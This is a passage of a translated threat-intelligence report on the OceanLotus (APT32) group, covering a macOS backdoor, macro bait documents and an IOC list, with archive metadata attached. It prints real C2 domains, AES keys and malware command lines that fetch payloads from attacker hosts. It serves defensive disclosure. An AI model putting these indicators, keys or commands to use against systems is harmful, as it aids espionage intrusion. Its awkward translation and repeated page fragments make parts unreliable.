DLL\r\nc28abdfe45590af0ef5c4e7a96d4b979 In the 2018-08-15 s, 03:20:08 92672 DllHijack. DLL\r\ncf0b74fe79156694a2e3ea81e3bb1f85 In the 2018-08-20 s, 02:12:34 92672 DllHijack. DLL\r\nc78fd680494b505525d706c285d5ebce In the 2018-08-20 s, 02:23:12 92672 DllHijack. DLL\r\n77390c852addc3581d14acf06991982e In the 2018-08-29 s, 03:20:46 168960 DllHijack. DLL\r\n49e969a9312ee2ae639002716276073f In the 2018-08-29 s, 03:50:11 93184 DllHijack. DLL\r\nf5ad93917cd5b119f82b52a0d62f4a93 In the 2018-08-30 s, 08:22:15 129536 DllHijack. DLL\r\n6291eabf6a8c58cad6a04879b7ba229f In the 2018-09-04 s, 02:24:06 92672 DllHijack. DLL\r\n9a10292157ac3748212fb77769873f6c In the 2018-09-04 s, 02:42:21 129536 DllHijack. DLL\r\na406626173132c8bd6fe52672deacbe7 In the 2018-09-06 s, 02:03:30 92672 DllHijack. DLL\r\n93c3d6cffdcb0a2f29844ff130a920be In the 2018-09-06 s, 08:01:41 129536 DllHijack. DLL\r\n6b8fc8c9fe4f4ef90b2fcbcc0d24cfc9 In the 2018-09-10 s, 02:44:30 119296 DllHijack. DLL\r\n1211dea7b68129d48513662e546c6e21 In the 2018-09-11 s, 03:06:50 92672 DllHijack. DLL\r\n2f1f8142d479a1daf3cbd404c7c22f9f In the 2018-09-17 s, 04:12:57 111616 DllHijack. DLL\r\n0f877ad5464fcbb12e1c019adf7065cc In the 2018-09-18 s, 02:24:47 92672 DllHijack. DLL\r\ncab262b84dbd319f3df84f221e5c451f In the 2018-09-18 s, 03:00:51 111616 DllHijack. DLL\r\n07ff4f943b202f4e16c227679d9b598a In the 2018-09-19 s, 02:01:04 92672 DllHijack. DLL\r\n7a6ba3e26c86f3366f544f4553c9d00a In the 2018-09-24 s, 07:12:34 93184 DllHijack. DLL\r\nhttps://ti.qianxin.com/blog/articles/oceanlotus-attacks-to-indochinese-peninsula-evolution-of-targets-techniques-and-procedure/\r\nPage 57 of 79\n\n518f52aabd9a059d181bfe864097091e In the 2018-09-25 s, 02:59:04 111616 DllHijack. DLL\r\n70a64ae401c0a5f091b5382dea2432df In the 2018-10-03 s, 04:17:51 111616 DllHijack. DLL\r\nd40b4277e0d417e2e0cff47458ddd62d In the 2018-10-09 s, 03:22:19 95232 DllHijack. DLL\r\n5f1bc795aa784f781d91acc97bec6644 In the 2018-10-17 s, 08:02:50 209412 DllHijack. DLL\r\n305d992821740a9cbbda9b3a2b50a67c In the 2018-10-22 s, 03:27:24 92672 DllHijack. DLL\r\n7df61bc3a146fcf56fe1bbd3c26ea8c0 In the 2018-10-22 s, 03:34:11 113664 DllHijack. DLL\r\n3c04352c5230b8cbaa12f262dc01d335 In the 2018-11-14 s, 07:07:53 92672 DllHijack. DLL\r\n41f717eda9bc37de6ea584597f60521f In the 2018-11-15 s, 02:03:44 92672 DllHijack. DLL\r\ndb81a7e405822be63634001ec0503620 In the 2018-11-28 s, 08:55:24 112128 DllHijack. DLL\r\n865a7e3cd87b5bc5feec9d61313f2944 In the 2018-11-29 s, 02:21:27 92672 DllHijack. DLL\r\naad445e7ffc5ce463996e5db13350c5b In the 2018-11-29 s, 08:18:42 115712 DllHijack. DLL\r\n9bcd0b2590c53e4c0ed5614b127c6ba7 In the 2018-11-29 s, 09:25:15 112128 DllHijack. DLL\r\n7338852de96796d7f733123f04dd1ae9 In the 2018-12-04 s, 02:27:26 92672 DllHijack. DLL\r\n906a6898d099eb50c570a4014c1760f5 In the 2018-12-04 s, 04:31:45 115712 DllHijack. DLL\r\na530410bca453c93b65d0de465c428e4 In the 2018-12-06 s, 03:21:22 115712 DllHijack. DLL\r\nde409b2fe935ca61066908a92e80be29 In the 2018-12-10 s, 04:03:20 115712 DllHijack. DLL\r\n2756b2f6ba5bcf811c8baced5e98b79f In the 2018-12-10 s, 04:29:12 92672 DllHijack. DLL\r\nMAC Backdoor\r\nIn the previous chapter, we found that the resolved IP of C2:rio.imbandaad.com was 198.15.119.125.When we\r\nchecked the IP again, we found that one of the domain names, web.dalalepredaa.com, had been labeled as\r\nOceanLotus\r\nAnd through this domain name, we discovered a OceanLotus's newest MAC sample.\r\nhttps://ti.qianxin.com/blog/articles/oceanlotus-attacks-to-indochinese-peninsula-evolution-of-targets-techniques-and-procedure/\r\nPage 58 of 79\n\nTo disguised as a document, first of all, the sample will be in the folder name in docx d, lowercase Roman\r\nnumeral five hundred instead, to deceive users: Don khieu nai. ⅾ ocx\r\nWindows looks like this:\r\nOn the Macosx system is the office icon of the docx file, is actually a directory:\r\nBecause iconFile in info.plist points to the iconFile of a doc, as shown below:\r\nhttps://ti.qianxin.com/blog/articles/oceanlotus-attacks-to-indochinese-peninsula-evolution-of-targets-techniques-and-procedure/\r\nPage 59 of 79\n\nThe following is the signature information of the sample, as shown in the figure:\r\nhttps://ti.qianxin.com/blog/articles/oceanlotus-attacks-to-indochinese-peninsula-evolution-of-targets-techniques-and-procedure/\r\nPage 60 of 79\n\nAfter the sample is executed, three directories will be created in the Library directory:\r\nLaunchAgents\r\nMedia\r\nVideo\r\nInstall an application named LaunchAgents to start up:\r\nThe application points to the mediaagentd program in the Video directory:\r\nhttps://ti.qianxin.com/blog/articles/oceanlotus-attacks-to-indochinese-peninsula-evolution-of-targets-techniques-and-procedure/\r\nPage 61 of 79\n\nAt the same time, the previous directory was replaced by a real docx file, to achieve a diversion:\r\nThe released mediaagentd program is shelled and will be loaded and executed in memory after decryption:\r\nhttps://ti.qianxin.com/blog/articles/oceanlotus-attacks-to-indochinese-peninsula-evolution-of-targets-techniques-and-procedure/\r\nPage 62 of 79\n\nThe unshelled MACOS file is as follows:\r\nAt the entrance of the file, there will be a while loop, which will collect computer information and send it, enter\r\nthe loop function of remote control, sleep for a random period of time, and continue the repeated process:\r\nMany of the internal strings are encrypted. The following is where the encryption function is used:\r\nhttps://ti.qianxin.com/blog/articles/oceanlotus-attacks-to-indochinese-peninsula-evolution-of-targets-techniques-and-procedure/\r\nPage 63 of 79\n\nThe decryption method is mainly through CCCrypt, and the algorithm is aes, iv is 0, as shown in the figure:\r\nAES encryption key (HEX) : 4 e620abedafb4d9866cc9d9c2d29e2d7ea18adf1 32-bit zero padding enough:\r\nhttps://ti.qianxin.com/blog/articles/oceanlotus-attacks-to-indochinese-peninsula-evolution-of-targets-techniques-and-procedure/\r\nPage 64 of 79\n\nThe decrypted data is as follows:\r\nAnd the information collected is encrypted by AES and sent through the CURL library:\r\nhttps://ti.qianxin.com/blog/articles/oceanlotus-attacks-to-indochinese-peninsula-evolution-of-targets-techniques-and-procedure/\r\nPage 65 of 79\n\nThe message distribution function of remote control is as follows: different operations will be performed\r\naccording to its own token in the first place. The following is the operation of listing the directory:\r\nThe key used for data transmission is different from the key used for decryption string. The following is the\r\nencryption key for data transmission:\r\n07e74ff2ce9688c8f79b91ab32c95d11c140d3ac\r\nAnd some string decryption algorithms use base64 decryption first, then aes decrypt:\r\nhttps://ti.qianxin.com/blog/articles/oceanlotus-attacks-to-indochinese-peninsula-evolution-of-targets-techniques-and-procedure/\r\nPage 66 of 79\n\nBut the base64 used in the decryption is not the standard base64. The following figure shows the base64 table of\r\nthe malicious code:\r\nhe encrypted data is sent to C2, as shown in the figure below:\r\nC2: web.dalalepredaa.com\r\nIt is worth noting that some of the recent Mac samples of hibiscus were found to have signatures. After\r\ndeduplication, we found two commonly used ones:\r\nMelinda Cline (P74QRJXB2F)\r\nDAVID DOWELL (B5YH6VDVRE)\r\nhttps://ti.qianxin.com/blog/articles/oceanlotus-attacks-to-indochinese-peninsula-evolution-of-targets-techniques-and-procedure/\r\nPage 67 of 79\n\nOffice Documents\r\nThrough correlation analysis, it is found that the macro document sample and a large number of samples have the\r\nsame origin.\r\nAs can be seen from the comparison case below, the content of the document was created at the same time and by\r\nthe same author.\r\nThe following figure is the template feature, template file name is very OceanLotus characteristics.\r\nAfter analysis, we found that we summarized the author names commonly used in the attack documents of\r\nOceanLotus, among which the largest attack activities were \"DEV\" activity and \"Tushar\" activity.\r\nhttps://ti.qianxin.com/blog/articles/oceanlotus-attacks-to-indochinese-peninsula-evolution-of-targets-techniques-and-procedure/\r\nPage 68 of 79\n\nAfter correlation analysis of various dimensions, the document name and Hash value involved in this series of\r\nmalicious macro file launching activities can be obtained.\r\nThe document name\r\nThe document name MD5\r\nTest. The doc 5 c9ef8b5263651a08ea1b79057a5ee28\r\nScan_Mau_Ao_Thun. Doc b858c08cf7807e462ca335233bd83fe7\r\nThe Content marketing Kaspersky. Doc c313f8a5fd8ca391fc85193bc879ab02\r\nDoc. Doc 473 fdfefa92725099ca87e992edbc92c\r\nLY_ANH_TRUNG_CV. Doc 02 cec2f17a7910b6fa994f340bbbc297\r\nLY ANH TRUNG CV. Doc dd5ae0c0a7e17d101f570812fec4e5e4\r\nLY_ANH_TRUNG_CV. Doc 90 e5ff68bf06cb930ed8c040139c4650\r\nLY_ANH_TRUNG_CV. Doc 6 db450c4c756071ecafff425d6183d7d\r\nCV - DucNguyenMinh. Doc cb39e2138af92c32e53c97c0aa590d48\r\nCV, Nguyen Minh Duc. Docx 8 e13895504e643cd8e0e87377b25bd6b\r\nDanh sach can bo vi pham.doc d3c27f779d615a1d3a35dff5e9561eb0\r\nDanh Sach Nhan Vien Bien Thu Tien Cong Ty. Docx 27425360 d18feea54860420006ea9833\r\nhttps://ti.qianxin.com/blog/articles/oceanlotus-attacks-to-indochinese-peninsula-evolution-of-targets-techniques-and-procedure/\r\nPage 69 of 79\n\nDanh Sach Nhan Vien Bien Thu Tien Cong Ty. Docx cf0142da12509f544a59093495c3a6dd\r\nCV - AnthonyWei - the CustomerService. Docx b1df440e5dd64ffae9f7e792993f2f4c\r\n878 fa022bd5e5caf678fe8d728ce42ee\r\nf78be074f6bc67a712e751254df5f166\r\nHo Chi Minh. Docx e2aed850c18449a43886fc79b342132f\r\nDS - Card - ChienThang - TraVinh docx 74 b456adf2ae708789fb2d34ecccb954\r\nHopDong - XXX - TP - 092018. Docx 72263750 df84e24fe645206a51772c88\r\nBBLV_ASC_DG_092018. Docx 3 a574c28beca4f3c94d30e3cf3979f4c\r\nIndo. Docx ee836e0f7a40571523bf56dba59898f6\r\nDanh sach cac nha đ ắ t ấ u tranh b ị b 2.9. Doc f6068b672a19ce14981df011a55081e4\r\n1 00ac0d7337290b74bdd7f43ec4a67ddb\r\nAfter analyzing the bait names of these samples, each has its own characteristics\r\n1, the name has political characteristics: arrested activists list\r\nInclude resume trolls\r\nCan be linked to an email analyzed by @vupt_bka security researcher using the OceanLotus resume phishing.\r\nhttps://twitter.com/vupt_bka/status/1083653486963638275\r\nhttps://ti.qianxin.com/blog/articles/oceanlotus-attacks-to-indochinese-peninsula-evolution-of-targets-techniques-and-procedure/\r\nPage 70 of 79\n\n3. There are some documents showing the startup of the induction macro, which are inconsistent with the previous\r\ninduction interface.\r\nIn addition, historical samples are also different from the latest sample technology. As shown below, some\r\nhistorical samples do not use template injection technology, but use direct macro code execution method, and the\r\ncode to be executed is shown in the document content, namely the OHN macro code mentioned in the section of\r\nsample analysis.\r\nhttps://ti.qianxin.com/blog/articles/oceanlotus-attacks-to-indochinese-peninsula-evolution-of-targets-techniques-and-procedure/\r\nPage 71 of 79\n\nAfter correlation analysis of the macro samples mentioned above, it can be found that the earliest such\r\nattack was in 2017. The bait document uploaded by Vietnam was a test sample with a high probability from\r\nthe file name.\r\nSAMPLES 08 _11__12_2017 (317).\r\nc4d35f3263fef4a533e7403682a034c3\r\n4, the highest frequency of the Vietnamese file protection bait series\r\nhttps://ti.qianxin.com/blog/articles/oceanlotus-attacks-to-indochinese-peninsula-evolution-of-targets-techniques-and-procedure/\r\nPage 72 of 79\n\nCompression Files\r\nIn the process of analyzing a Thu moi 209.rar sample of OceanLotus, we found that the generation time of the\r\nsample was suspected to be a custom suspect\r\nAs seen from the upload time of the sample, the upload time to VT is March 1, 2019, and the time difference in\r\nthe compressed package is too large.\r\nTherefore, after correlation capture of this time, we found multiple correlation samples of OceanLotus.\r\nThe file name MD5\r\n60982849 - c8e4-4039-8 f59 - dfb78d8bab0d\r\n15 f5adf1-8798-49 bf - a6c3d90b69e b666-4 bcbc1bef20d2befdd290e31269e0174a\r\n4052 d2e7 - cd4 ca42-4-8841-52 f782bba411 dfaa343552e8d470096a0a09a018930f\r\nFfea6446 - e47 ab7a - 4 - b7ff - e461f9775177 9 b1ce9df321ce88ade4ff3b0ada5d414\r\n5 d47e097 - c3bc - 401 - e - 8 c0f - e877280b368a da14eece6191551a31d37d1e96681cd1\r\nThu moi 2019. Rar 76289f02a0b31143d87d5e35839fb24a\r\nhttps://ti.qianxin.com/blog/articles/oceanlotus-attacks-to-indochinese-peninsula-evolution-of-targets-techniques-and-procedure/\r\nPage 73 of 79\n\nTherefore, it can be further confirmed that the OceanLotus group will customize the sample generation time, and\r\nbatch generation of samples for delivery.\r\nConclusion\r\nThis report covers a large number of attacks on Indochinese Peninsula countries and the resources used by the\r\nOceanLotus Group, revealing its endless history of attacks, extremely wide range of targets and very creative\r\ntechnical means. In attacks, the group was always changing baits, payloads, AV evasion techniques, even domain\r\nnames assets are constantly evolving, reflects a very strong ability to fight and attack will.\r\nTherefore, when we are tracking the attack activities of OceanLotus against China, we extend our understanding\r\nof the TTP of this notorious group. This process will never end.\r\nIOCs\r\nDomain names:\r\nsyn.servebbs.com\r\nword.webhop.info\r\nbeta.officopedia.com\r\noutlook.updateoffices.net\r\noutlook.betamedias.com\r\noutlook.officebetas.com\r\noffice.allsafebrowsing.com\r\nopen.betaoffice.net\r\ncortanazone.com\r\nb.cortanazone.com\r\ncortanasyn.com\r\napi.blogdns.com\r\ndominikmagoffin.com\r\nblog.artinhauvin.com\r\nworker.baraeme.com\r\nkingsoftcdn.com\r\nhttps://ti.qianxin.com/blog/articles/oceanlotus-attacks-to-indochinese-peninsula-evolution-of-targets-techniques-and-procedure/\r\nPage 74 of 79\n\nstyle.fontstaticloader.com\r\nplan.evillese.com\r\nbluesky2018man.com\r\nenum.arkoorr.com\r\nbackground.ristians.com\r\npong.dynathome.net\r\nzone.servehttp.com\r\ncdn.eworldship-news.com\r\napi.blogdns.com\r\nonline.stienollmache.xyz\r\nimage.fontstaticloader.com\r\nmappingpotentials.com\r\nvnbizcom.com\r\ncdn3.onlinesurveygorilla.com\r\neworldship-news.com\r\nenormousamuses.com\r\n163mailservice.com\r\nstackbio.com\r\nmailserviceactivation.com\r\nweb.dalalepredaa.com\r\nrio.imbandaad.com\r\np12.alerentice.com\r\nBait files\r\nfd128b9f0cbdc374227cf5564371aacc\r\n4a0144c7436e3ff67cf2d935d82d1743\r\n4c30e792218d5526f6499d235448bdd9\r\nhttps://ti.qianxin.com/blog/articles/oceanlotus-attacks-to-indochinese-peninsula-evolution-of-targets-techniques-and-procedure/\r\nPage 75 of 79\n\nd8a5a375da7798be781cf3ea689ae7ab\r\n2d3fb8d5b4cefc9660d98e0ad46ff91a\r\n89e3f31c6261f4725b891c8fd29049c9\r\n7b0e819bd8304773c3648ab03c9f182a\r\nc4d35f3263fef4a533e7403682a034c3\r\nb1df440e5dd64ffae9f7e792993f2f4c\r\na76be0181705809898d5d7d9aed86ee8\r\n2785311085b6ca782b476d9c2530259c\r\n60501717f81eacd54facecf3ebadc306\r\n3d7cd531d17799832e262eb7995abde6\r\nc7931fa4c144c1c4dc19ad4c41c1e17f\r\nCorrelated files:\r\n5c9ef8b5263651a08ea1b79057a5ee28\r\nb858c08cf7807e462ca335233bd83fe7\r\nc313f8a5fd8ca391fc85193bc879ab02\r\n473fdfefa92725099ca87e992edbc92c\r\n02cec2f17a7910b6fa994f340bbbc297\r\ndd5ae0c0a7e17d101f570812fec4e5e4\r\n90e5ff68bf06cb930ed8c040139c4650\r\n6db450c4c756071ecafff425d6183d7d\r\ncb39e2138af92c32e53c97c0aa590d48\r\n8e13895504e643cd8e0e87377b25bd6b\r\nd3c27f779d615a1d3a35dff5e9561eb0\r\n27425360d18feea54860420006ea9833\r\ncf0142da12509f544a59093495c3a6dd\r\nb1df440e5dd64ffae9f7e792993f2f4c\r\nhttps://ti.qianxin.com/blog/articles/oceanlotus-attacks-to-indochinese-peninsula-evolution-of-targets-techniques-and-procedure/\r\nPage 76 of 79\n\n878fa022bd5e5caf678fe8d728ce42ee\r\nf78be074f6bc67a712e751254df5f166\r\ne2aed850c18449a43886fc79b342132f\r\n74b456adf2ae708789fb2d34ecccb954\r\n72263750df84e24fe645206a51772c88\r\n3a574c28beca4f3c94d30e3cf3979f4c\r\nee836e0f7a40571523bf56dba59898f6\r\nf6068b672a19ce14981df011a55081e4\r\n00ac0d7337290b74bdd7f43ec4a67ddb\r\nCorrelated PE files:\r\n2f9af6b9d73218c578653d6d9bd02d4d\r\nc9d29501410e19938cd8e01630dc677b\r\nURL:\r\nhttp[:]//download-attachments.s3.amazonaws.com/db08b565038ac83e89e7b55201479f37ea49e525/f0c6ea8e-d2f8-445f-b649-57808b2015b7\r\nSample characteristics\r\nZA:\\Code\\Macro_NB2\\Request\\PostData32.exe -u https://word.webhop.info/blak32.gif -t 200000\r\nZA:\\Code\\Macro_NB2\\Request\\PostData32.exe -u https://syn.servebbs.com/kuss32.gif -t 200000\r\nUA:\\Code\\Nb2VBS\\Request\\PostData32.exe -u https://ristineho.com/threex32.png -t 60000\r\nXA:\\Code\\Macro_NB2\\Request\\PostData32.exe -u https://cortanasyn.com/kirr32.png -t 200000\r\nC:\\Users\\WIN7UTL64\\Desktop\\Macro_NB2_new\\Request\\PostData32.exe\r\n{C:\\Users\\WIN7UTL64\\Desktop\\Macro_NB2_new\\Request\\PostData32.exe -u\r\nhttps://office.allsafebrowsing.com/fdsw32.png -t 240000\r\nSecurityAndMaintenance_Error.bin\r\nd:\\work\\malware\\vinacap\\SecurityAndMaintenance_Error.png\r\nd:\\work\\forensics\\vinacap\\dfir\\nhule\\files\\SecurityAndMaintenance_Error.png\r\nhttps://ti.qianxin.com/blog/articles/oceanlotus-attacks-to-indochinese-peninsula-evolution-of-targets-techniques-and-procedure/\r\nPage 77 of 79\n\nD:\\work\\forensics\\vinacap\\DFIR\\Nhule\\files\\SecurityAndMaintenance_Error.png\r\nMAC signatures：\r\nMelinda Cline (P74QRJXB2F)\r\nDAVID DOWELL (B5YH6VDVRE)\r\nAES KEY：\r\nDecrypted String 4E620ABEDAFB4D9866CC9D9C2D29E2D7EA18ADF1\r\nEncrypted Packet 07E74FF2CE9688C8F79B91AB32C95D11C140D3AC\r\nReferences\r\n[1] https://ti.qianxin.com/blog/articles/oceanlotus-targets-chinese-university/\r\n[2] https://twitter.com/blackorbird/status/1118399331688570880\r\n[3] https://medium.com/@sp1d3rm4n/apt32-oceanlotus-m%E1%BB%99t-chi%E1%BA%BFn-d%E1%BB%8Bch-apt-b%C3%A0i-b%E1%BA%A3n-nh%C6%B0-th%E1%BA%BF-n%C3%A0o-ph%E1%BA%A7n-2-119a24585d9a\r\n[4] https://twitter.com/blackorbird/status/1086186184768815104\r\n[5] https://twitter.com/RedDrip7/status/1119204830633848834\r\nAppendix\r\nRedDrip Team\r\nRedDrip Team of QiAnXin (Formly SkyEye Team), founded in 2015, focuses on the research of APT attacks. As\r\nthe first team of revealing OceanLotus (APT-C-00) attack, RedDrip Team is also a key part of QiAnXin Threat\r\nIntelligence Center.\r\nOur team has security analysts, developers, covering full cycle of threat intelligence operation: data sourcing,\r\nprocessing, analyzing, and correlation. Our threat intelligence supports QiAnXin products and third party\r\nproducts.\r\nRelying on leading security data capacity and security expertise, we found several noteworthy APT campaigns,\r\nincluding OceanLotus.\r\nFollow us in WeChat\r\nhttps://ti.qianxin.com/blog/articles/oceanlotus-attacks-to-indochinese-peninsula-evolution-of-targets-techniques-and-procedure/\r\nPage 78 of 79\n\nSource: https://ti.qianxin.com/blog/articles/oceanlotus-attacks-to-indochinese-peninsula-evolution-of-targets-techniques-and-procedure/\r\nhttps://ti.qianxin.com/blog/articles/oceanlotus-attacks-to-indochinese-peninsula-evolution-of-targets-techniques-and-procedure/\r\nPage 79 of 79\n\n https://ti.qianxin.com/blog/articles/oceanlotus-attacks-to-indochinese-peninsula-evolution-of-targets-techniques-and-procedure/  \nThe decrypted data is a beacon module, as shown in the figure:\nExtract the configuration file information as follows: \n   Page 35 of 79\n\n https://ti.qianxin.com/blog/articles/oceanlotus-attacks-to-indochinese-peninsula-evolution-of-targets-techniques-and-procedure/      \nThe following figure shows the comparison between the original file and the encrypted file. It can be seen that\nthere is no change in the code segment, except that the array of global variables 0xd000 is encrypted by the\nrandom key.       \n   Page 43 of 79   \n\n https://ti.qianxin.com/blog/articles/oceanlotus-attacks-to-indochinese-peninsula-evolution-of-targets-techniques-and-procedure/     \nAt the same time, the previous directory was replaced by a real docx file, to achieve a diversion:\nThe released mediaagentd program is shelled and will be loaded and executed in memory after decryption:\n   Page 62 of 79  \n\n https://ti.qianxin.com/blog/articles/oceanlotus-attacks-to-indochinese-peninsula-evolution-of-targets-techniques-and-procedure/     \nThe decryption method is mainly through CCCrypt, and the algorithm is aes, iv is 0, as shown in the figure:\nAES encryption key (HEX) : 4 e620abedafb4d9866cc9d9c2d29e2d7ea18adf1  32-bit zero padding enough:\n   Page 64 of 79",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"ETDA"
	],
	"references": [
		"https://ti.qianxin.com/blog/articles/oceanlotus-attacks-to-indochinese-peninsula-evolution-of-targets-techniques-and-procedure/"
	],
	"report_names": [
		"oceanlotus-attacks-to-indochinese-peninsula-evolution-of-targets-techniques-and-procedure"
	],
	"threat_actors": [
		{
			"id": "af509bbb-8d18-4903-a9bd-9e94099c6b30",
			"created_at": "2023-01-06T13:46:38.585525Z",
			"updated_at": "2026-04-10T02:00:03.030833Z",
			"deleted_at": null,
			"main_name": "APT32",
			"aliases": [
				"OceanLotus",
				"ATK17",
				"G0050",
				"APT-C-00",
				"APT-32",
				"Canvas Cyclone",
				"SeaLotus",
				"Ocean Buffalo",
				"OceanLotus Group",
				"Cobalt Kitty",
				"Sea Lotus",
				"APT 32",
				"POND LOACH",
				"TIN WOODLAWN",
				"Ocean Lotus"
			],
			"source_name": "MISPGALAXY:APT32",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "9f101d9c-05ea-48b9-b6f1-168cd6d06d12",
			"created_at": "2023-01-06T13:46:39.396409Z",
			"updated_at": "2026-04-10T02:00:03.312816Z",
			"deleted_at": null,
			"main_name": "Earth Lusca",
			"aliases": [
				"CHROMIUM",
				"ControlX",
				"TAG-22",
				"BRONZE UNIVERSITY",
				"AQUATIC PANDA",
				"RedHotel",
				"Charcoal Typhoon",
				"Red Scylla",
				"Red Dev 10",
				"BountyGlad"
			],
			"source_name": "MISPGALAXY:Earth Lusca",
			"tools": [
				"RouterGod",
				"SprySOCKS",
				"ShadowPad",
				"POISONPLUG",
				"Barlaiy",
				"Spyder",
				"FunnySwitch"
			],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "870f6f62-84f5-48ca-a18e-cf2902cd6924",
			"created_at": "2022-10-25T15:50:23.303818Z",
			"updated_at": "2026-04-10T02:00:05.301184Z",
			"deleted_at": null,
			"main_name": "APT32",
			"aliases": [
				"APT32",
				"SeaLotus",
				"OceanLotus",
				"APT-C-00",
				"Canvas Cyclone"
			],
			"source_name": "MITRE:APT32",
			"tools": [
				"Mimikatz",
				"ipconfig",
				"Kerrdown",
				"Cobalt Strike",
				"SOUNDBITE",
				"OSX_OCEANLOTUS.D",
				"KOMPROGO",
				"netsh",
				"RotaJakiro",
				"PHOREAL",
				"Arp",
				"Denis",
				"Goopy"
			],
			"source_id": "MITRE",
			"reports": null
		},
		{
			"id": "18a7b52d-a1cd-43a3-8982-7324e3e676b7",
			"created_at": "2025-08-07T02:03:24.688416Z",
			"updated_at": "2026-04-10T02:00:03.734754Z",
			"deleted_at": null,
			"main_name": "BRONZE UNIVERSITY",
			"aliases": [
				"Aquatic Panda",
				"Aquatic Panda ",
				"CHROMIUM",
				"CHROMIUM ",
				"Charcoal Typhoon",
				"Charcoal Typhoon ",
				"Earth Lusca",
				"Earth Lusca ",
				"FISHMONGER ",
				"Red Dev 10",
				"Red Dev 10 ",
				"Red Scylla",
				"Red Scylla ",
				"RedHotel",
				"RedHotel ",
				"Tag-22",
				"Tag-22 "
			],
			"source_name": "Secureworks:BRONZE UNIVERSITY",
			"tools": [
				"Cobalt Strike",
				"Fishmaster",
				"FunnySwitch",
				"Spyder",
				"njRAT"
			],
			"source_id": "Secureworks",
			"reports": null
		},
		{
			"id": "5da6b5fd-1955-412a-81aa-069fb50b6e31",
			"created_at": "2025-08-07T02:03:25.116085Z",
			"updated_at": "2026-04-10T02:00:03.668978Z",
			"deleted_at": null,
			"main_name": "TIN WOODLAWN",
			"aliases": [
				"APT32 ",
				"Cobalt Kitty",
				"OceanLotus",
				"WOODLAWN "
			],
			"source_name": "Secureworks:TIN WOODLAWN",
			"tools": [
				"Cobalt Strike",
				"Denis",
				"Goopy",
				"JEShell",
				"KerrDown",
				"Mimikatz",
				"Ratsnif",
				"Remy",
				"Rizzo",
				"RolandRAT"
			],
			"source_id": "Secureworks",
			"reports": null
		},
		{
			"id": "6abcc917-035c-4e9b-a53f-eaee636749c3",
			"created_at": "2022-10-25T16:07:23.565337Z",
			"updated_at": "2026-04-10T02:00:04.668393Z",
			"deleted_at": null,
			"main_name": "Earth Lusca",
			"aliases": [
				"Bronze University",
				"Charcoal Typhoon",
				"Chromium",
				"G1006",
				"Red Dev 10",
				"Red Scylla"
			],
			"source_name": "ETDA:Earth Lusca",
			"tools": [
				"Agentemis",
				"AntSword",
				"BIOPASS",
				"BIOPASS RAT",
				"BadPotato",
				"Behinder",
				"BleDoor",
				"Cobalt Strike",
				"CobaltStrike",
				"Doraemon",
				"FRP",
				"Fast Reverse Proxy",
				"FunnySwitch",
				"HUC Port Banner Scanner",
				"KTLVdoor",
				"Mimikatz",
				"NBTscan",
				"POISONPLUG.SHADOW",
				"PipeMon",
				"RbDoor",
				"RibDoor",
				"RouterGod",
				"SAMRID",
				"ShadowPad Winnti",
				"SprySOCKS",
				"WinRAR",
				"Winnti",
				"XShellGhost",
				"cobeacon",
				"fscan",
				"lcx",
				"nbtscan"
			],
			"source_id": "ETDA",
			"reports": null
		},
		{
			"id": "2439ad53-39cc-4fff-8fdf-4028d65803c0",
			"created_at": "2022-10-25T16:07:23.353204Z",
			"updated_at": "2026-04-10T02:00:04.55407Z",
			"deleted_at": null,
			"main_name": "APT 32",
			"aliases": [
				"APT 32",
				"APT-C-00",
				"APT-LY-100",
				"ATK 17",
				"G0050",
				"Lotus Bane",
				"Ocean Buffalo",
				"OceanLotus",
				"Operation Cobalt Kitty",
				"Operation PhantomLance",
				"Pond Loach",
				"SeaLotus",
				"SectorF01",
				"Tin Woodlawn"
			],
			"source_name": "ETDA:APT 32",
			"tools": [
				"Agentemis",
				"Android.Backdoor.736.origin",
				"AtNow",
				"Backdoor.MacOS.OCEANLOTUS.F",
				"BadCake",
				"CACTUSTORCH",
				"CamCapture Plugin",
				"CinaRAT",
				"Cobalt Strike",
				"CobaltStrike",
				"Cuegoe",
				"DKMC",
				"Denis",
				"Goopy",
				"HiddenLotus",
				"KOMPROGO",
				"KerrDown",
				"METALJACK",
				"MSFvenom",
				"Mimikatz",
				"Nishang",
				"OSX_OCEANLOTUS.D",
				"OceanLotus",
				"PHOREAL",
				"PWNDROID1",
				"PhantomLance",
				"PowerSploit",
				"Quasar RAT",
				"QuasarRAT",
				"RatSnif",
				"Remy",
				"Remy RAT",
				"Rizzo",
				"Roland",
				"Roland RAT",
				"SOUNDBITE",
				"Salgorea",
				"Splinter RAT",
				"Terracotta VPN",
				"Yggdrasil",
				"cobeacon",
				"denesRAT",
				"fingerprintjs2"
			],
			"source_id": "ETDA",
			"reports": null
		},
		{
			"id": "d53593c3-2819-4af3-bf16-0c39edc64920",
			"created_at": "2022-10-27T08:27:13.212301Z",
			"updated_at": "2026-04-10T02:00:05.272802Z",
			"deleted_at": null,
			"main_name": "Earth Lusca",
			"aliases": [
				"Earth Lusca",
				"TAG-22",
				"Charcoal Typhoon",
				"CHROMIUM",
				"ControlX"
			],
			"source_name": "MITRE:Earth Lusca",
			"tools": [
				"Mimikatz",
				"PowerSploit",
				"Tasklist",
				"certutil",
				"Cobalt Strike",
				"Winnti for Linux",
				"Nltest",
				"NBTscan",
				"ShadowPad"
			],
			"source_id": "MITRE",
			"reports": null
		}
	],
	"ts_created_at": 1775434455,
	"ts_updated_at": 1775792208,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/a76f3d080039a78ae0632cfb3e281e6143bf3534.pdf",
		"text": "https://archive.orkl.eu/a76f3d080039a78ae0632cfb3e281e6143bf3534.txt",
		"img": "https://archive.orkl.eu/a76f3d080039a78ae0632cfb3e281e6143bf3534.jpg"
	}
}